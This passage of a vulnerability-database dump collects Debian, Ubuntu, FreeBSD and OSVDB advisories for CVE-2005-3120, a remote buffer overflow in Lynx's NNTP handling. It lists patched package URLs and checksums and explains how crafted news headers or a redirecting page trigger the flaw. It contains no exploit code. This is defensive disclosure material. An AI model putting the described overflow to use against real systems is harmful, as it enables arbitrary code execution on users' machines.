http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2_s390.deb\n Size/MD5 checksum: 1468622 72b310726d3baecfe26ba27ce9f9f46a\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-ssl/lynx-ssl_2.8.4.1b-3.2_sparc.deb\n Size/MD5 checksum: 1497394 83d65399cb15b48bcd9024f01e3f9400\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "modified": "2005-10-27T00:00:00", "published": "2005-10-27T00:00:00", "id": "DEBIAN:DSA-876-1:39741", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00272.html", "title": "[SECURITY] [DSA 876-1] New lynx-ssl packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:21:41", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 874-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nOctober 27th, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : lynx\nVulnerability : buffer overflow\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2005-3120\n\nUlf H\u00e4rnhammar discovered a buffer overflow in lynx, a text-mode\nbrowser for the WWW that can be remotely exploited. 
During the\nhandling of Asian characters when connecting to an NNTP server lynx\ncan be tricked to write past the boundary of a buffer which can lead\nto the execution of arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 2.8.4.1b-3.3.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 2.8.5-2sarge1.\n\nFor the unstable distribution (sid) this problem will be fixed soon.\n\nWe recommend that you upgrade your lynx package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3.dsc\n Size/MD5 checksum: 579 117f4e3d95a601741dc672012719042c\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3.diff.gz\n Size/MD5 checksum: 14448 5e5d819520415baa0d91f75f0ee4f0af\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b.orig.tar.gz\n Size/MD5 checksum: 2557510 053a10f76b871e3944c11c7776da7f7a\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_alpha.deb\n Size/MD5 checksum: 1610266 c887b1d0598b99fe1e3f45fedaaf3321\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_arm.deb\n Size/MD5 checksum: 1487698 fb290d8440ef3b2b59f10e270b1d7bb6\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_i386.deb\n Size/MD5 checksum: 1442878 31da62cb1f065acc2f65f2fd4481d530\n\n Intel IA-64 
architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_ia64.deb\n Size/MD5 checksum: 1762578 e57e52ed11ea52b55d6a5ede09b466a8\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_hppa.deb\n Size/MD5 checksum: 1555440 4beb62a33cc2c0f00a45e69bed8b5591\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_m68k.deb\n Size/MD5 checksum: 1405626 7f8d46f3d143781364337b666a55fa42\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_mips.deb\n Size/MD5 checksum: 1507782 ae2ce1ddbe4855967d050a3e64e42e26\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_mipsel.deb\n Size/MD5 checksum: 1503970 08e80c500a4d57a4e47fc45dbf0ebfe3\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_powerpc.deb\n Size/MD5 checksum: 1491262 2b58dece4ae0a8a98b31e2f8eba40d13\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_s390.deb\n Size/MD5 checksum: 1463360 1e5419b8db89374ea1c96f1219fe6e15\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.4.1b-3.3_sparc.deb\n Size/MD5 checksum: 1492728 f4da20fe1ac83ee9adf37d49bb896c63\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1.dsc\n Size/MD5 checksum: 614 e7d5a14aafd2e9775c3175e44e3f9964\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1.diff.gz\n Size/MD5 checksum: 14891 59cf146b8defbfa1b78df4306b951441\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5.orig.tar.gz\n Size/MD5 checksum: 2984352 5f516a10596bd52c677f9bfd9579bc28\n\n Alpha architecture:\n\n 
http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_alpha.deb\n Size/MD5 checksum: 1994554 8a9eb6cd8ee34ad17aa06b912b588659\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_amd64.deb\n Size/MD5 checksum: 1881684 5afcd53828326a0cb056681047bd48e6\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_arm.deb\n Size/MD5 checksum: 1852912 de530d45ce98e68932ec4624abd67201\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_i386.deb\n Size/MD5 checksum: 1852488 ba9125c2da9c21a8bcd173ff82948a28\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_ia64.deb\n Size/MD5 checksum: 2128374 156c023772481f6e9f8629c44082c94d\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_hppa.deb\n Size/MD5 checksum: 1909574 24bbbc72ab025249a3adaa7717b316ff\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_m68k.deb\n Size/MD5 checksum: 1780590 449249ca3e257a33a5a9d7da16379076\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_mips.deb\n Size/MD5 checksum: 1894006 f30b06596b5ed9d881e1f3ba767aca2a\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_mipsel.deb\n Size/MD5 checksum: 1889486 0b650edf6ca51547aedd7c7754bbda99\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_powerpc.deb\n Size/MD5 checksum: 1878284 d90c1dc3fb2d5be179b827c32c14e222\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_s390.deb\n Size/MD5 checksum: 1866758 60f30f0ebd7556799e565b4411a8d429\n\n Sun Sparc architecture:\n\n 
http://security.debian.org/pool/updates/main/l/lynx/lynx_2.8.5-2sarge1_sparc.deb\n Size/MD5 checksum: 1861536 85c12b7bd67f9800b49ab4b6b97a1dfd\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "modified": "2005-10-27T00:00:00", "published": "2005-10-27T00:00:00", "id": "DEBIAN:DSA-874-1:A85D0", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00270.html", "title": "[SECURITY] [DSA 874-1] New lynx packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:23:02", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1085-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nJune 1st, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : lynx-ssl\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE IDs : CVE-2004-1617 CAN-2005-3120\nBugTraq ID : 11443\nDebian Bug : 296340\n\n\nSeveral vulnerabilities have been discoverd in lynx, the popular\ntext-mode WWW browser. 
The Common Vulnerabilities and Exposures\nProject identifies the following vulnerabilities:\n\nCVE-2004-1617\n\n Michal Zalewski discovered that lynx is not able to grok invalid\n HTML including a TEXTAREA tag with a large COLS value and a large\n tag name in an element that is not terminated, and loops forever\n trying to render the broken HTML.\n\nCAN-2005-3120\n\n Ulf H\u00e4rnhammar discovered a buffer overflow that can be remotely\n exploited. During the handling of Asian characters when connecting\n to an NNTP server lynx can be tricked to write past the boundary\n of a buffer which can lead to the execution of arbitrary code.\n\nFor the old stable distribution (woody) these problems have been fixed in\nversion 2.8.5-2.5woody1.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 2.8.6-9sarge1.\n\nFor the unstable distribution (sid) these problems will be fixed soon.\n\nWe recommend that you upgrade your lynx-cur package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given at the end of this advisory:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1.dsc\n Size/MD5 checksum: 640 e6f29a507e298508f72eb24c21b1bdde\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1.diff.gz\n Size/MD5 checksum: 634446 19fad72695b064d6a6e893bb1ea1006f\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5.orig.tar.gz\n Size/MD5 checksum: 2557113 81764528e685747ec00e7e23f18fd6d3\n\n 
Architecture independent components:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur-wrapper_2.8.5-2.5woody1_all.deb\n Size/MD5 checksum: 161086 eec2317cf887d4d8762866c26b6783ad\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1_alpha.deb\n Size/MD5 checksum: 1419168 50e1763a404316ec33802c77f55180ee\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1_arm.deb\n Size/MD5 checksum: 1292792 e922a7feefe43f2e0bff7713ed292403\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1_i386.deb\n Size/MD5 checksum: 1252720 667586b0cb239a23efaa03a45e44ba41\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1_ia64.deb\n Size/MD5 checksum: 1573108 88a04e9032f61055812cbbdc5b66ebcc\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1_hppa.deb\n Size/MD5 checksum: 1361852 2cf253de737b654ee1cce1b13b43639a\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1_m68k.deb\n Size/MD5 checksum: 1212894 07b758555efaeff043595c2338dece95\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1_mips.deb\n Size/MD5 checksum: 1314946 b737ed585f45a69a19f2f5314509918b\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1_mipsel.deb\n Size/MD5 checksum: 1310968 a82a5f1be84d27067c9b63b8af540dd6\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1_powerpc.deb\n Size/MD5 checksum: 1299254 a5498c2256c092e2a8ebef012df0f4b2\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1_s390.deb\n 
Size/MD5 checksum: 1271028 44125629519a455e212ae5397071e7bd\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.5-2.5woody1_sparc.deb\n Size/MD5 checksum: 1297518 33c40521d500228c1973f4e67b424f40\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1.dsc\n Size/MD5 checksum: 667 af1fc2fa2f7673145760fe57c0aea8fb\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1.diff.gz\n Size/MD5 checksum: 5605374 2deb21954ef7e8e39dfd26abdf1f2e64\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6.orig.tar.gz\n Size/MD5 checksum: 3023366 02f47f32cb2b96ea5dc1bd335e19ef4a\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur-wrapper_2.8.6-9sarge1_all.deb\n Size/MD5 checksum: 12296 a615ca6b426011b3f40cd20ad48cb2cb\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_alpha.deb\n Size/MD5 checksum: 2017328 ff45d271444be4f6560372dfb0b274b2\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_amd64.deb\n Size/MD5 checksum: 1901508 bb17d7c45e77910289765aec3f77c30c\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_arm.deb\n Size/MD5 checksum: 1871322 2555b982f070c91e00348370eaa48244\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_i386.deb\n Size/MD5 checksum: 1876050 4dd3066564cd0fc919bc326c51686f26\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_ia64.deb\n Size/MD5 checksum: 2155322 3736a40dd67ccba9a9f90e44f6a8ada7\n\n HP Precision architecture:\n\n 
http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_hppa.deb\n Size/MD5 checksum: 1930998 6402a13b8834d92d2e01a306eb374d0f\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_m68k.deb\n Size/MD5 checksum: 1797494 01b7c40f1acfcc91c2ac467c867503e9\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_mips.deb\n Size/MD5 checksum: 1914628 87ae23a7369ea464d3840653ac1522b6\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_mipsel.deb\n Size/MD5 checksum: 1911160 8cff5b755921183a11062644001e0759\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_powerpc.deb\n Size/MD5 checksum: 1898106 e907c041632012ad322f3c701b6696cd\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_s390.deb\n Size/MD5 checksum: 1886340 e2f640b6e388de70f160c6fe68dff134\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/l/lynx-cur/lynx-cur_2.8.6-9sarge1_sparc.deb\n Size/MD5 checksum: 1878152 f0a57a2d5ac589bec4e7994bc3ac2030\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "modified": "2006-06-01T00:00:00", "published": "2006-06-01T00:00:00", "id": "DEBIAN:DSA-1085-1:3AB5E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00171.html", "title": "[SECURITY] [DSA 1085-1] New lynx-cur packages 
fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:16", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://lynx.isc.org/\n[Vendor Specific Advisory URL](http://security.gentoo.org/glsa/glsa-200510-15.xml)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.47/SCOSA-2005.47.txt)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-010.htm)\n[Vendor Specific Advisory URL](http://www.ubuntu.com/usn/usn-206-1)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20051003-01-U.asc)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2006.7/SCOSA-2006.7.txt)\nSecurity Tracker: 1015065\n[Secunia Advisory ID:17216](https://secuniaresearch.flexerasoftware.com/advisories/17216/)\n[Secunia Advisory ID:17248](https://secuniaresearch.flexerasoftware.com/advisories/17248/)\n[Secunia Advisory ID:17340](https://secuniaresearch.flexerasoftware.com/advisories/17340/)\n[Secunia Advisory ID:20383](https://secuniaresearch.flexerasoftware.com/advisories/20383/)\n[Secunia Advisory ID:17150](https://secuniaresearch.flexerasoftware.com/advisories/17150/)\n[Secunia Advisory ID:17231](https://secuniaresearch.flexerasoftware.com/advisories/17231/)\n[Secunia Advisory ID:17230](https://secuniaresearch.flexerasoftware.com/advisories/17230/)\n[Secunia Advisory ID:17288](https://secuniaresearch.flexerasoftware.com/advisories/17288/)\n[Secunia Advisory ID:17335](https://secuniaresearch.flexerasoftware.com/advisories/17335/)\n[Secunia Advisory ID:17444](https://secuniaresearch.flexerasoftware.com/advisories/17444/)\n[Secunia Advisory ID:17445](https://secuniaresearch.flexerasoftware.com/advisories/17445/)\n[Secunia Advisory ID:18584](https://secuniaresearch.flexerasoftware.com/advisories/18584/)\n[Secunia 
Advisory ID:17238](https://secuniaresearch.flexerasoftware.com/advisories/17238/)\n[Secunia Advisory ID:17480](https://secuniaresearch.flexerasoftware.com/advisories/17480/)\n[Secunia Advisory ID:18376](https://secuniaresearch.flexerasoftware.com/advisories/18376/)\nRedHat RHSA: RHSA-2005:803\nOther Advisory URL: http://www.trustix.org/errata/2005/0055/\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2005&m=slackware-security.423056\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2005-Nov/0001.html\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1085\nOther Advisory URL: http://frontal1.mandriva.com/security/advisories?name=MDKSA-2005:186\nOther Advisory URL: http://www.debian.org/security/2005/dsa-874\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-10/0198.html\n[CVE-2005-3120](https://vulners.com/cve/CVE-2005-3120)\n", "modified": "2005-10-17T11:38:00", "published": "2005-10-17T11:38:00", "href": "https://vulners.com/osvdb/OSVDB:20019", "id": "OSVDB:20019", "type": "osvdb", "title": "Lynx NNTP HTrjis() Function Remote Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "unix", "description": "\nUlf H\u00e4rnhammar reports:\n\nWhen Lynx connects to an NNTP server to fetch information\n\t about the available articles in a newsgroup, it will\n\t call a function called HTrjis() with the information\n\t from certain article headers. The function adds missing\n\t ESC characters to certain data, to support Asian character\n\t sets. 
However, it does not check if it writes outside\n\t of the char array buf, and that causes a remote stack-based\n\t buffer overflow.\n\n", "modified": "2006-10-05T00:00:00", "published": "2005-10-17T00:00:00", "id": "C01170BF-4990-11DA-A1B8-000854D03344", "href": "https://vuxml.freebsd.org/freebsd/c01170bf-4990-11da-a1b8-000854d03344.html", "title": "lynx -- remote buffer overflow", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:14", "bulletinFamily": "software", "description": "===========================================================\r\nUbuntu Security Notice USN-206-1 October 17, 2005\r\nlynx vulnerability\r\nCAN-2005-3120\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 4.10 (Warty Warthog)\r\nUbuntu 5.04 (Hoary Hedgehog)\r\nUbuntu 5.10 (Breezy Badger)\r\n\r\nThe following packages are affected:\r\n\r\nlynx\r\n\r\nThe problem can be corrected by upgrading the affected package to\r\nversion 2.8.5-1ubuntu1.1 (for Ubuntu 4.10), 2.8.5-2ubuntu0.5.04 (for\r\nUbuntu 5.04), or 2.8.5-2ubuntu0.5.10 (for Ubuntu 5.10). In general, a\r\nstandard system upgrade is sufficient to effect the necessary changes.\r\n\r\nDetails follow:\r\n\r\nUlf Harnhammar discovered a remote vulnerability in Lynx when\r\nconnecting to a news server (NNTP). The function that added missing\r\nescape characters to article headers did not check the size of the\r\ntarget buffer. Specially crafted news entries could trigger a buffer\r\noverflow, which could be exploited to execute arbitrary code with the\r\nprivileges of the user running lynx. 
In order to exploit this, the\r\nuser is not even required to actively visit a news site with Lynx\r\nsince a malicious HTML page could automatically redirect to an nntp://\r\nURL with malicious news items.\r\n\r\n\r\nUpdated packages for Ubuntu 4.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1.diff.gz\r\n Size/MD5: 17668 c5251ad9cead60e416cf21a461371877\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1.dsc\r\n Size/MD5: 620 4b4310912f7f76fe01cf8312707be244\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz\r\n Size/MD5: 2984352 5f516a10596bd52c677f9bfd9579bc28\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_amd64.deb\r\n Size/MD5: 1882872 8be361fa3eead1e76cbbf2426c255c8b\r\n\r\n i386 architecture (x86 compatible Intel/AMD)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_i386.deb\r\n Size/MD5: 1833368 d481856973186dd5d432e1102c49a917\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-1ubuntu1.1_powerpc.deb\r\n Size/MD5: 1878484 1496a6331a4666295bd89703e509037a\r\n\r\nUpdated packages for Ubuntu 5.04:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.diff.gz\r\n Size/MD5: 18015 6171994c6c8f67d84267aa69d00ba292\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.dsc\r\n Size/MD5: 626 08ff9f5a955222f051e4e78101ef7c40\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz\r\n Size/MD5: 2984352 5f516a10596bd52c677f9bfd9579bc28\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_amd64.deb\r\n Size/MD5: 1881886 74bc70c3731c903e69fd74eb0a6d2d68\r\n\r\n i386 
architecture (x86 compatible Intel/AMD)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_i386.deb\r\n Size/MD5: 1832038 f2e333289856566f93f19ca8fd0c5dfd\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04_powerpc.deb\r\n Size/MD5: 1878380 6440d4eae5fadef31aaf21c5396ef401\r\n\r\nUpdated packages for Ubuntu 5.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.diff.gz\r\n Size/MD5: 18015 0f7b6e508094dabd59bee9018b368523\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.dsc\r\n Size/MD5: 626 2a90195b05000a7f318eb04386d1ad1c\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz\r\n Size/MD5: 2984352 5f516a10596bd52c677f9bfd9579bc28\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_amd64.deb\r\n Size/MD5: 1901120 c2e0da03f20b892aaea81d0f0588f7b1\r\n\r\n i386 architecture (x86 compatible Intel/AMD)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_i386.deb\r\n Size/MD5: 1833214 7c021c0b0667d3aedc8479579d52e5ad\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10_powerpc.deb\r\n Size/MD5: 1881080 5ef72d193817f616e99f01113f6053dd", "modified": "2005-10-19T00:00:00", "published": "2005-10-19T00:00:00", "id": "SECURITYVULNS:DOC:9961", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:9961", "title": "[USN-206-1] Lynx vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}